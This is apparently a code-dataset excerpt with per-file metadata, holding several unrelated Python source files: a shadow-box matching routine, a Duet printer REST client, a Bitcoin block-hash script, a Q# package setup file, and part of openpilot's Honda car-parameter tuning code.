(x0, y0, w, h) # rec2: (x0, y0, w, h) # x0, y0: the upper left point of rec. # w, h: the length and width of rec. # """ def compute_iou(rec1, rec2): left_x = max(rec1[0], rec2[0]) left_y = max(rec1[1], rec2[1]) right_x = min(rec1[0] + rec1[2], rec2[0] + rec2[2]) right_y = min(rec1[1] + rec1[3], rec2[1] + rec2[3]) if left_x >= right_x or left_y >= right_y: return 0 else: S_mid = (right_y - left_y) * (right_x - left_x) S_total = (rec1[2] * rec1[3]) + (rec2[2] * rec2[3]) - S_mid return S_mid / S_total def box_combine(o, s, box1, box2): """ args: box1 : (x1_0, y1_0, x1_1, y1_1) box2: (x2_0, y2_0, x2_1, y2_1) return: dict["1_2":(min(x1_0,x2_0),min(y1_0,y2_0),max(x1_1,x2-1),max(y2_1,y2_2))] """ name = '{}_{}'.format(o, s) combine = (min(box1[0], box2[0]), min(box1[1], box2[1]), max(box1[2], box2[2]), max(box1[3], box2[3])) combine = (combine[0], combine[1], combine[2] - combine[0], combine[3] - combine[1]) # XYXY to XYWH return [name, combine] def compute_direction(box1,box2): pass def rect_distance(a, b): x1, y1, x1b, y1b = a x2, y2, x2b, y2b = b left = x2b < x1 right = x1b < x2 bottom = y2b < y1 top = y1b < y2 if top and left: return dist((x1, y1b), (x2b, y2)) elif left and bottom: return dist((x1, y1), (x2b, y2b)) elif bottom and right: return dist((x1b, y1), (x2, y2b)) elif right and top: return dist((x1b, y1b), (x2, y2)) elif left: return x1 - x2b elif right: return x2 - x1b elif bottom: return y1 - y2b elif top: return y2 - y1b else: return 0 def dist(a, b): return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2) def matchor(instance, association): results = [] objects = [i for i, v in enumerate(instance.pred_classes) if v == 0] shadows = [i for i, v in enumerate(instance.pred_classes) if v == 1] boxes = [] for o in objects: if instance.scores[o] < 0.5: continue for s in shadows: if instance.scores[s] < 0.5: continue o_box = instance.pred_boxes[o].tensor[0].numpy() s_box = instance.pred_boxes[s].tensor[0].numpy() o_area = (o_box[2] - o_box[0]) * (o_box[3] - o_box[1]) s_area = (s_box[2] - s_box[0]) * (s_box[3] - s_box[1]) if compute_iou((o_box[0], o_box[1], o_box[2] - o_box[0], o_box[3] - o_box[1]), (s_box[0], s_box[1], s_box[2] - s_box[0], s_box[3] - s_box[1])) == 0: if rect_distance(o_box, s_box) >= s_box[3] - s_box[1]: continue boxes.append(box_combine(o, s, o_box, s_box)) ass_boxes = association.pred_boxes.tensor.numpy() pair = [] for i, ass_box in enumerate(ass_boxes): scores = [] ass_box = [ass_box[0], ass_box[1], ass_box[2] - ass_box[0], ass_box[3] - ass_box[1]] for box in boxes: k, v = box scores.append([str(i) + '_' + k, compute_iou(ass_box, v)]) if len(ass_boxes) == 1: pair.append(sorted(scores, key=takeTwo, reverse=True)[:1]) else: pair.append(sorted(scores, key=takeTwo, reverse=True)[:1]) if not sum([sc[1] > 0.5 for sc in pair[i]]): pair[i] = [[0, 0]] O = {} S = {} for k, v in enumerate(pair): if v != [[0, 0]] and v != []: r, o, s = v[0][0].split('_') if o in O: if s in S: if v[0][1] > O[o][1] and v[0][1] > S[s][1]: O[o] = v[0] S[s] = v[0] else: if v[0][1] > O[o][1]: O[o] = v[0] elif s in S: if v[0][1] > S[s][1]: S[s] = v[0] else: O[o] = v[0] S[s] = v[0] for k, v in S.items(): r, o, s = v[0].split('_') results.append((int(o), int(s), int(r))) ins_association = instance.pred_classes * 0 ret_association = association.pred_classes * 0 if results == []: instance.pred_associations = ins_association association.pred_associations = ret_association return instance, association association_id = 1 for i in results: if ins_association[i[0]]+ins_association[i[1]] == 0: ins_association[i[0]] = association_id ins_association[i[1]] = association_id ret_association[i[2]] = association_id association_id += 1 instance.pred_associations = ins_association association.pred_associations = ret_association return instance, association def combine_association(instance, association): pred_masks = [mask.numpy() for mask in instance.pred_masks] pred_scores = instance.scores.numpy() pred_boxes = instance.pred_boxes.tensor.numpy().tolist() pred_classes = instance.pred_classes.numpy() h, w = pred_masks[0].shape pred_associations = instance.pred_associations.numpy() pred_light = association.pred_light.tensor.numpy() ret = Instances((h,w)) ins = Instances((h,w)) if np.sum(pred_associations) == 0: ret.pred_boxes = association.pred_boxes ret.scores = association.scores ret.pred_classes = association.pred_classes ret.pred_light = association.pred_light.tensor.numpy().tolist() segm = np.zeros((h,w,1),order='F',dtype='uint8') ret.pred_masks = [segm] * len(association.pred_boxes) ret.pred_associations = association.pred_associations.numpy().astype('int').tolist() instance.pred_associations = pred_associations.astype('int').tolist() return ret,instance mask_map = {} for i, ass in enumerate(pred_associations): if ass != 0: if ass in mask_map: if pred_classes[i] == 1: mask_map[ass].append((pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i])) else: mask_map[ass] = [(pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i]),mask_map[ass][0]] else: mask_map[ass] = [(pred_masks[i], pred_scores[i],pred_classes[i],pred_boxes[i])] results = [] boxes = [] scores = [] classes = [] associations = [] light = [] for i,ass in enumerate(association.pred_associations): if ass != 0: light.append(pred_light[i].tolist()) for k, v in mask_map.items(): associations.append(int(k)) s, o = v avg_score = float((s[1]+ o[1])/2) _s = s[0].reshape(h,w,1) _o = o[0].reshape(h,w,1) comb = _s + _o classes.append(0) segm = encode(np.array(comb,order='F',dtype='uint8'))[0] boxes.append(BoxMode.convert(eval.maskUtils.toBbox(segm), BoxMode.XYWH_ABS, BoxMode.XYXY_ABS)) results.append(comb) scores.append(avg_score) ret.pred_masks = results ret.pred_boxes = boxes ret.scores = scores ret.pred_classes = classes ret.pred_associations = associations ret.pred_light= light instance.pred_associations = instance.pred_associations.numpy().astype('int').tolist() return ret,instance
34.55873
160
0.593331
1fc57994749a3a64e86cace471d7de063b4cdaca
4,180
py
Python
duetwebapi/api/dwc_api.py
AndyEveritt/DuetWebAPI
7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd
[ "MIT" ]
8
2021-01-28T16:29:12.000Z
2022-03-27T04:15:01.000Z
duetwebapi/api/dwc_api.py
AndyEveritt/DuetWebAPI
7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd
[ "MIT" ]
1
2021-04-14T14:54:08.000Z
2021-04-21T15:54:41.000Z
duetwebapi/api/dwc_api.py
AndyEveritt/DuetWebAPI
7b4826b24716b7de6bd87f7ab1fcd1f8f4b3c3cd
[ "MIT" ]
1
2021-02-05T03:40:50.000Z
2021-02-05T03:40:50.000Z
import logging import os from typing import Dict, List, Union from io import StringIO, TextIOWrapper, BytesIO import requests from .base import DuetAPI class DWCAPI(DuetAPI): """ Duet Web Control REST API Interface. Used with a Duet 2/3 in standalone mode. Must use RRF3. """ api_name = 'DWC_REST' def connect(self, password=''): """ Start connection to Duet """ url = f'{self.base_url}/rr_connect' r = requests.get(url, {'password': password}) if not r.ok: raise ValueError return r.json() def disconnect(self): """ End connection to Duet """ url = f'{self.base_url}/rr_disconnect' r = requests.get(url) if not r.ok: raise ValueError return r.json() def get_model(self, key: str = None, depth: int = 99, verbose: bool = True, null: bool = True, frequent: bool = False, obsolete: bool = False) -> Dict: url = f'{self.base_url}/rr_model' flags = f'd{depth}' flags += 'v' if verbose is True else '' flags += 'n' if null is True else '' flags += 'f' if frequent is True else '' flags += 'o' if obsolete is True else '' r = requests.get(url, {'flags': flags, 'key': key}) if not r.ok: raise ValueError j = r.json() return j['result'] def _get_reply(self) -> Dict: url = f'{self.base_url}/rr_reply' r = requests.get(url) if not r.ok: raise ValueError return r.text def send_code(self, code: str) -> Dict: url = f'{self.base_url}/rr_gcode' r = requests.get(url, {'gcode': code}) if not r.ok: raise ValueError reply = self._get_reply() return {'response': reply} def get_file(self, filename: str, directory: str = 'gcodes', binary: bool = False) -> str: """ filename: name of the file you want to download including extension directory: the folder that the file is in, options are ['gcodes', 'macros', 'sys'] binary: return binary data instead of a string returns the file as a string or binary data """ url = f'{self.base_url}/rr_download' r = requests.get(url, {'name': f'/{directory}/{filename}'}) if not r.ok: raise ValueError if binary: return r.content else: return r.text def upload_file(self, file: Union[str, bytes, StringIO, TextIOWrapper, BytesIO], filename: str, directory: str = 'gcodes') -> Dict: url = f'{self.base_url}/rr_upload?name=/{directory}/{filename}' r = requests.post(url, data=file) if not r.ok: raise ValueError return r.json() def get_fileinfo(self, filename: str = None, directory: str = 'gcodes') -> Dict: url = f'{self.base_url}/rr_fileinfo' if filename: r = requests.get(url, {'name': f'/{directory}/{filename}'}) else: r = requests.get(url) if not r.ok: raise ValueError return r.json() def delete_file(self, filename: str, directory: str = 'gcodes') -> Dict: url = f'{self.base_url}/rr_delete' r = requests.get(url, {'name': f'/{directory}/{filename}'}) if not r.ok: raise ValueError return r.json() def move_file(self, from_path, to_path, **_ignored): # BUG this doesn't work currently raise NotImplementedError url = f'{self.base_url}/rr_move' r = requests.get(url, {'old': f'{from_path}', 'new': f'{to_path}'}) if not r.ok: raise ValueError return r.json() def get_directory(self, directory: str) -> List[Dict]: url = f'{self.base_url}/rr_filelist' r = requests.get(url, {'dir': f'/{directory}'}) if not r.ok: raise ValueError return r.json()['files'] def create_directory(self, directory: str) -> Dict: url = f'{self.base_url}/rr_mkdir' r = requests.get(url, {'dir': f'/{directory}'}) if not r.ok: raise ValueError return r.json()
32.913386
155
0.566029
73bb7606df83d72c9922408e611480a60d2e0717
3,036
py
Python
contrib/linearize/linearize-hashes.py
RottenCoin/agouti
745e1c8bffe286a517dff6d5ba69e39630e772e3
[ "MIT" ]
6
2018-10-31T10:43:13.000Z
2021-05-02T15:41:26.000Z
contrib/linearize/linearize-hashes.py
RottenCoin/agouti
745e1c8bffe286a517dff6d5ba69e39630e772e3
[ "MIT" ]
null
null
null
contrib/linearize/linearize-hashes.py
RottenCoin/agouti
745e1c8bffe286a517dff6d5ba69e39630e772e3
[ "MIT" ]
4
2018-09-18T15:42:38.000Z
2019-10-27T19:02:53.000Z
#!/usr/bin/python # # linearize-hashes.py: List blocks in a linear, no-fork version of the chain. # # Copyright (c) 2013-2014 The Bitcoin developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # from __future__ import print_function import json import struct import re import base64 import httplib import sys settings = {} class BitcoinRPC: def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30) def execute(self, obj): self.conn.request('POST', '/', json.dumps(obj), { 'Authorization' : self.authhdr, 'Content-type' : 'application/json' }) resp = self.conn.getresponse() if resp is None: print("JSON-RPC: no response", file=sys.stderr) return None body = resp.read() resp_obj = json.loads(body) return resp_obj @staticmethod def build_request(idx, method, params): obj = { 'version' : '1.1', 'method' : method, 'id' : idx } if params is None: obj['params'] = [] else: obj['params'] = params return obj @staticmethod def response_is_error(resp_obj): return 'error' in resp_obj and resp_obj['error'] is not None def get_block_hashes(settings, max_blocks_per_call=10000): rpc = BitcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpassword']) height = settings['min_height'] while height < settings['max_height']+1: num_blocks = min(settings['max_height']+1-height, max_blocks_per_call) batch = [] for x in range(num_blocks): batch.append(rpc.build_request(x, 'getblockhash', [height + x])) reply = rpc.execute(batch) for x,resp_obj in enumerate(reply): if rpc.response_is_error(resp_obj): print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr) exit(1) assert(resp_obj['id'] == x) # assume replies are in-sequence print(resp_obj['result']) height += num_blocks if __name__ == '__main__': if len(sys.argv) != 2: print("Usage: linearize-hashes.py CONFIG-FILE") sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 6161 if 'min_height' not in settings: settings['min_height'] = 0 if 'max_height' not in settings: settings['max_height'] = 313000 if 'rpcuser' not in settings or 'rpcpassword' not in settings: print("Missing username and/or password in cfg file", file=stderr) sys.exit(1) settings['port'] = int(settings['port']) settings['min_height'] = int(settings['min_height']) settings['max_height'] = int(settings['max_height']) get_block_hashes(settings)
26.631579
90
0.682477
680389e6a402a9694bd5e5c9ad07f1d8a0b920ba
2,026
py
Python
src/Python/qsharp-core/setup.py
jond01/iqsharp
4324d1d6de03102edf5fd210b6f22655ee9b6fa2
[ "MIT" ]
115
2019-07-11T16:41:24.000Z
2022-02-06T13:30:32.000Z
src/Python/qsharp-core/setup.py
jond01/iqsharp
4324d1d6de03102edf5fd210b6f22655ee9b6fa2
[ "MIT" ]
346
2019-07-11T17:26:31.000Z
2022-03-30T06:52:51.000Z
src/Python/qsharp-core/setup.py
jond01/iqsharp
4324d1d6de03102edf5fd210b6f22655ee9b6fa2
[ "MIT" ]
50
2019-07-23T16:03:02.000Z
2022-03-29T21:01:14.000Z
#!/bin/env python # -*- coding: utf-8 -*- ## # setup.py: Installs Python host functionality for Q#. ## # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. ## ## IMPORTS ## import setuptools import os ## VERSION INFORMATION ## # Our build process sets the PYTHON_VERSION environment variable to a version # string that is compatible with PEP 440, and so we inherit that version number # here and propagate that to qsharp/version.py. # # To make sure that local builds still work without the same environment # variables, we'll default to 0.0.0.1 as a development version. version = os.environ.get('PYTHON_VERSION', '0.0.0.1') with open('./qsharp/version.py', 'w') as f: f.write(f'''# Auto-generated file, do not edit. ## # version.py: Specifies the version of the qsharp package. ## # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. ## __version__ = "{version}" is_conda = False _user_agent_extra = "[{version}]" ''') ## DESCRIPTION ## # The long description metadata passed to setuptools is used to populate the # PyPI page for this package. Thus, we'll generate the description by using the # same README.md file that we use in the GitHub repo. with open("./README.md", "r") as fh: long_description = fh.read() ## SETUPTOOLS INVOCATION ## setuptools.setup( name="qsharp-core", version=version, author="Microsoft", author_email="que-contacts@microsoft.com", description="Python client for Q#, a domain-specific quantum programming language", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/microsoft/iqsharp", packages=setuptools.find_packages(), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], install_requires=[ 'jupyter_client', 'pyzmq<20.0.0' # due to incompatibility of IQ# with pyzmq>=20.0.0 ] )
29.794118
87
0.699408
03074b875c107a69650d8885bf8e3b0d83c216f9
20,505
py
Python
selfdrive/car/honda/interface.py
shoes22/openpilot
a965de3c96a53b67d106cfa775e3407db82dd0e1
[ "MIT" ]
53
2018-07-31T04:26:48.000Z
2022-03-29T08:50:06.000Z
selfdrive/car/honda/interface.py
shoes22/openpilot
a965de3c96a53b67d106cfa775e3407db82dd0e1
[ "MIT" ]
47
2018-07-21T15:31:51.000Z
2022-03-25T10:21:24.000Z
selfdrive/car/honda/interface.py
shoes22/openpilot
a965de3c96a53b67d106cfa775e3407db82dd0e1
[ "MIT" ]
124
2018-09-05T18:32:30.000Z
2022-03-13T16:30:50.000Z
#!/usr/bin/env python3 from cereal import car from panda import Panda from common.numpy_fast import interp from common.params import Params from selfdrive.car.honda.values import CarControllerParams, CruiseButtons, HondaFlags, CAR, HONDA_BOSCH, HONDA_NIDEC_ALT_SCM_MESSAGES, HONDA_BOSCH_ALT_BRAKE_SIGNAL from selfdrive.car import STD_CARGO_KG, CivicParams, scale_rot_inertia, scale_tire_stiffness, gen_empty_fingerprint, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase from selfdrive.car.disable_ecu import disable_ecu from selfdrive.config import Conversions as CV ButtonType = car.CarState.ButtonEvent.Type EventName = car.CarEvent.EventName TransmissionType = car.CarParams.TransmissionType class CarInterface(CarInterfaceBase): @staticmethod def get_pid_accel_limits(CP, current_speed, cruise_speed): if CP.carFingerprint in HONDA_BOSCH: return CarControllerParams.BOSCH_ACCEL_MIN, CarControllerParams.BOSCH_ACCEL_MAX else: # NIDECs don't allow acceleration near cruise_speed, # so limit limits of pid to prevent windup ACCEL_MAX_VALS = [CarControllerParams.NIDEC_ACCEL_MAX, 0.2] ACCEL_MAX_BP = [cruise_speed - 2., cruise_speed - .2] return CarControllerParams.NIDEC_ACCEL_MIN, interp(current_speed, ACCEL_MAX_BP, ACCEL_MAX_VALS) @staticmethod def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=[]): # pylint: disable=dangerous-default-value ret = CarInterfaceBase.get_std_params(candidate, fingerprint) ret.carName = "honda" if candidate in HONDA_BOSCH: ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.hondaBosch)] ret.radarOffCan = True # Disable the radar and let openpilot control longitudinal # WARNING: THIS DISABLES AEB! ret.openpilotLongitudinalControl = Params().get_bool("DisableRadar") ret.pcmCruise = not ret.openpilotLongitudinalControl else: ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.hondaNidec)] ret.enableGasInterceptor = 0x201 in fingerprint[0] ret.openpilotLongitudinalControl = True ret.pcmCruise = not ret.enableGasInterceptor ret.communityFeature = ret.enableGasInterceptor if candidate == CAR.CRV_5G: ret.enableBsm = 0x12f8bfa7 in fingerprint[0] # Detect Bosch cars with new HUD msgs if any(0x33DA in f for f in fingerprint.values()): ret.flags |= HondaFlags.BOSCH_EXT_HUD.value # Accord 1.5T CVT has different gearbox message if candidate == CAR.ACCORD and 0x191 in fingerprint[1]: ret.transmissionType = TransmissionType.cvt # Certain Hondas have an extra steering sensor at the bottom of the steering rack, # which improves controls quality as it removes the steering column torsion from feedback. # Tire stiffness factor fictitiously lower if it includes the steering column torsion effect. # For modeling details, see p.198-200 in "The Science of Vehicle Dynamics (2014), M. Guiggiani" ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0], [0]] ret.lateralTuning.pid.kiBP, ret.lateralTuning.pid.kpBP = [[0.], [0.]] ret.lateralTuning.pid.kf = 0.00006 # conservative feed-forward if candidate in HONDA_BOSCH: ret.longitudinalTuning.kpV = [0.25] ret.longitudinalTuning.kiV = [0.05] ret.longitudinalActuatorDelayUpperBound = 0.5 # s else: # default longitudinal tuning for all hondas ret.longitudinalTuning.kpBP = [0., 5., 35.] ret.longitudinalTuning.kpV = [1.2, 0.8, 0.5] ret.longitudinalTuning.kiBP = [0., 35.] ret.longitudinalTuning.kiV = [0.18, 0.12] eps_modified = False for fw in car_fw: if fw.ecu == "eps" and b"," in fw.fwVersion: eps_modified = True if candidate == CAR.CIVIC: stop_and_go = True ret.mass = CivicParams.MASS ret.wheelbase = CivicParams.WHEELBASE ret.centerToFront = CivicParams.CENTER_TO_FRONT ret.steerRatio = 15.38 # 10.93 is end-to-end spec if eps_modified: # stock request input values: 0x0000, 0x00DE, 0x014D, 0x01EF, 0x0290, 0x0377, 0x0454, 0x0610, 0x06EE # stock request output values: 0x0000, 0x0917, 0x0DC5, 0x1017, 0x119F, 0x140B, 0x1680, 0x1680, 0x1680 # modified request output values: 0x0000, 0x0917, 0x0DC5, 0x1017, 0x119F, 0x140B, 0x1680, 0x2880, 0x3180 # stock filter output values: 0x009F, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108 # modified filter output values: 0x009F, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0400, 0x0480 # note: max request allowed is 4096, but request is capped at 3840 in firmware, so modifications result in 2x max ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 8000], [0, 2560, 3840]] ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.1]] else: ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560], [0, 2560]] ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[1.1], [0.33]] tire_stiffness_factor = 1. elif candidate in (CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL): stop_and_go = True ret.mass = CivicParams.MASS ret.wheelbase = CivicParams.WHEELBASE ret.centerToFront = CivicParams.CENTER_TO_FRONT ret.steerRatio = 15.38 # 10.93 is end-to-end spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 1. ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]] elif candidate in (CAR.ACCORD, CAR.ACCORDH): stop_and_go = True ret.mass = 3279. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.83 ret.centerToFront = ret.wheelbase * 0.39 ret.steerRatio = 16.33 # 11.82 is spec end-to-end ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.8467 if eps_modified: ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.09]] else: ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] elif candidate == CAR.ACURA_ILX: stop_and_go = False ret.mass = 3095. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.67 ret.centerToFront = ret.wheelbase * 0.37 ret.steerRatio = 18.61 # 15.3 is spec end-to-end ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.72 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]] elif candidate in (CAR.CRV, CAR.CRV_EU): stop_and_go = False ret.mass = 3572. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.62 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 16.89 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 1000], [0, 1000]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.444 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]] ret.wheelSpeedFactor = 1.025 elif candidate == CAR.CRV_5G: stop_and_go = True ret.mass = 3410. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.66 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 16.0 # 12.3 is spec end-to-end if eps_modified: # stock request input values: 0x0000, 0x00DB, 0x01BB, 0x0296, 0x0377, 0x0454, 0x0532, 0x0610, 0x067F # stock request output values: 0x0000, 0x0500, 0x0A15, 0x0E6D, 0x1100, 0x1200, 0x129A, 0x134D, 0x1400 # modified request output values: 0x0000, 0x0500, 0x0A15, 0x0E6D, 0x1100, 0x1200, 0x1ACD, 0x239A, 0x2800 ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 10000], [0, 2560, 3840]] ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.21], [0.07]] else: ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]] ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.64], [0.192]] tire_stiffness_factor = 0.677 ret.wheelSpeedFactor = 1.025 elif candidate == CAR.CRV_HYBRID: stop_and_go = True ret.mass = 1667. + STD_CARGO_KG # mean of 4 models in kg ret.wheelbase = 2.66 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 16.0 # 12.3 is spec end-to-end ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.677 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] ret.wheelSpeedFactor = 1.025 elif candidate == CAR.FIT: stop_and_go = False ret.mass = 2644. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.53 ret.centerToFront = ret.wheelbase * 0.39 ret.steerRatio = 13.06 ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.75 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]] elif candidate == CAR.FREED: stop_and_go = False ret.mass = 3086. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.74 # the remaining parameters were copied from FIT ret.centerToFront = ret.wheelbase * 0.39 ret.steerRatio = 13.06 ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] tire_stiffness_factor = 0.75 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]] elif candidate == CAR.HRV: stop_and_go = False ret.mass = 3125 * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.61 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 15.2 ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] tire_stiffness_factor = 0.5 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.16], [0.025]] ret.wheelSpeedFactor = 1.025 elif candidate == CAR.ACURA_RDX: stop_and_go = False ret.mass = 3935. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.68 ret.centerToFront = ret.wheelbase * 0.38 ret.steerRatio = 15.0 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 1000], [0, 1000]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.444 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]] elif candidate == CAR.ACURA_RDX_3G: stop_and_go = True ret.mass = 4068. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.75 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 11.95 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]] ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] tire_stiffness_factor = 0.677 elif candidate == CAR.ODYSSEY: stop_and_go = False ret.mass = 4471. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 3.00 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 14.35 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.82 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]] elif candidate == CAR.ODYSSEY_CHN: stop_and_go = False ret.mass = 1849.2 + STD_CARGO_KG # mean of 4 models in kg ret.wheelbase = 2.90 ret.centerToFront = ret.wheelbase * 0.41 # from CAR.ODYSSEY ret.steerRatio = 14.35 ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 32767], [0, 32767]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.82 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]] elif candidate in (CAR.PILOT, CAR.PILOT_2019): stop_and_go = False ret.mass = 4204. * CV.LB_TO_KG + STD_CARGO_KG # average weight ret.wheelbase = 2.82 ret.centerToFront = ret.wheelbase * 0.428 ret.steerRatio = 17.25 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.444 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]] elif candidate == CAR.PASSPORT: stop_and_go = False ret.mass = 4204. * CV.LB_TO_KG + STD_CARGO_KG # average weight ret.wheelbase = 2.82 ret.centerToFront = ret.wheelbase * 0.428 ret.steerRatio = 17.25 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.444 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]] elif candidate == CAR.RIDGELINE: stop_and_go = False ret.mass = 4515. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 3.18 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 15.59 # as spec ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.444 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]] elif candidate == CAR.INSIGHT: stop_and_go = True ret.mass = 2987. * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.7 ret.centerToFront = ret.wheelbase * 0.39 ret.steerRatio = 15.0 # 12.58 is spec end-to-end ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.82 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] elif candidate == CAR.HONDA_E: stop_and_go = True ret.mass = 3338.8 * CV.LB_TO_KG + STD_CARGO_KG ret.wheelbase = 2.5 ret.centerToFront = ret.wheelbase * 0.5 ret.steerRatio = 16.71 ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end tire_stiffness_factor = 0.82 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] # TODO: can probably use some tuning else: raise ValueError("unsupported car %s" % candidate) # These cars use alternate user brake msg (0x1BE) if candidate in HONDA_BOSCH_ALT_BRAKE_SIGNAL: ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_ALT_BRAKE # These cars use alternate SCM messages (SCM_FEEDBACK AND SCM_BUTTON) if candidate in HONDA_NIDEC_ALT_SCM_MESSAGES: 